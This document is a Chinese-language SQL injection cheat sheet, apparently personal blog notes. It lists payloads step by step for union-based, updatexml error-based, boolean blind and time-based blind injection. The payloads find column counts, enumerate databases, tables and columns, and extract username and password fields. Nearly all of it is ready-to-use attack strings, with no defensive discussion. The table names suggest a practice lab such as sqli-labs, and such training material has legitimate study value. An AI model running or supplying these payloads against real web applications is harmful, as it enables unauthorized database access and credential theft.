SQL注入-1
联合查询
判断是否存在注入
id=1’ 异常
id=1’ and 1=1%23 正确
id=1’ and 1=2%23 错误
说明存在单引号字符型SQL注入
都错误的话,可以尝试数字型,双引号,括号型
2.求列数
id = 1 order by 4%23 正常
Id = 1 order by 5%23异常
说明有4列
格式 id = 1 order by 数字%23
3.求显示位
id = 1 and 1=2 union selcet 1,2,3,4%23 有几列就到几
之后去找看看那里替换了1,2,3,4中的哪一个
4.求数据库
找出替换了的那一位 之后用database() 替换掉数字位 便可得出数据库
假如2变了 就可以用2替换
Id=1 and 1=2 union select 1,database(),3,4%23
会根据这个爆出数据库。
5.求表名
id=1 and 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='数据库名'%23
求出的各个表的名字
(table_name)改为(0x23,table_name) 可以用#将表名分开
6.求列名
id=1 and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema='数据库名' and table_name = '表名’%23
7.求字段内容
id=2 union select 1,2,group_concat(需列,0x23,需列),4 from 数据库名.表名%23
即爆出需要的账户密码了
XPath方法
求库名
?id=1’and updatexml(1,concat(0x23,database()),1) %23
求表名
?id=1' and updatexml(1,concat(0x23,(select group_concat(table_name) from
information_schema.tables where table_schema='库名')),1) %23
求列名
?id=1' and updatexml(1,concat(0x23,(select group_concat(column_name) from
information_schema.columns where table_schema='库名' and table_name='表名')),1) %23
求字段内容
?id=1' and updatexml(1,concat(0x23,(select group_concat(列名,0x23,列名)from 库名.表名)),1)%23
盲注
1.求数据库长度
?id=1' and length(database())=8 %23
2.求数据库的ascii值
?id=1' and ascii(substr(database(),1,1))=115 %23
3.求表的数量
id=1' and (select count(table_name) from information_schema.tables
where table_schema='数据库名') = 4 %23
4.求表名的ascii值
表名的第一个ascii值
id=1' and ascii(substr((select table_name from information_schema.tables
where table_schema='表名' limit 0,1),1,1))=101 %23
表名的第二个ascii值
id=1' and ascii(substr((select table_name from information_schema.tables
where table_schema='表名' limit 0,1),2 ,1))=101 %23
…….
求列的数量
id=1' and (select count(column_name) from information_schema.columns
where table_schema='数据库名' and table_name='表名')=3 %23
求列名的ascii值
列名的第一个ascii值
id=1' and ascii(substr((select column_name from information_schema.columns
where table_schema='security' and table_name = 'users' limit 0,1),1,1))=105
%23
列名的第二个ascii值
id=1' and ascii(substr((select column_name from information_schema.columns
where table_schema='security' and table_name = 'users' limit 0,1),2 ,1))=105
%23
…
求字段的数量
id=1' and (select count(列名) from 数据库名.表名)=13 %23
求字段内容
字段的第一个ascii值
id=1' and ascii(substr((select concat(username,0x23,password)
from security.users limit 0,1),1,1))=68 %23
字段的第二个ascii值
id=1' and ascii(substr((select concat(username,0x23,password)
from security.users limit 0,1),2,1))=68 %23
时间型盲注
1.求数据库长度
?id=1' and if(length(database())=8,sleep(3),1) %23
2.求数据库的ascii值
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(3),1) %23
3.求表的数量
id=1' and if((select count(table_name) from information_schema.tables
where table_schema='数据库名') = 4 ,sleep(3),1)%23
4.求表名的ascii值
表名的第一个ascii值
id=1' and if(ascii(substr((select table_name from information_schema.tables
where table_schema='表名' limit 0,1),1,1))=101,sleep(3),1)%23
表名的第二个ascii值
id=1' and if(ascii(substr((select table_name from information_schema.tables
where table_schema='表名' limit 0,1),2 ,1))=101,sleep(3),1)%23
…….
求列的数量
id=1' and if((select count(column_name) from information_schema.columns
where table_schema='数据库名' and table_name='表名')=3,sleep(3),1) %23
求列名的ascii值
列名的第一个ascii值
id=1' and if(ascii(substr((select column_name from information_schema.columns
where table_schema='security' and table_name = 'users' limit 0,1),1,1))=105,sleep(3),1)
%23
列名的第二个ascii值
id=1' and if(ascii(substr((select column_name from information_schema.columns
where table_schema='security' and table_name = 'users' limit 0,1),2 ,1))=105,sleep(3),1)%23
…
求字段的数量
id=1' and if((select count(列名) from 数据库名.表名)=13,sleep(3),1) %23
求字段内容
字段的第一个ascii值
id=1' and if(ascii(substr((select concat(username,0x23,password)
from security.users limit 0,1),1,1))=68,sleep(3),1) %23
字段的第二个ascii值
id=1' and if(ascii(substr((select concat(username,0x23,password)
from security.users limit 0,1),2,1))=68,sleep(3),1) %23
浙公网安备 33010602011771号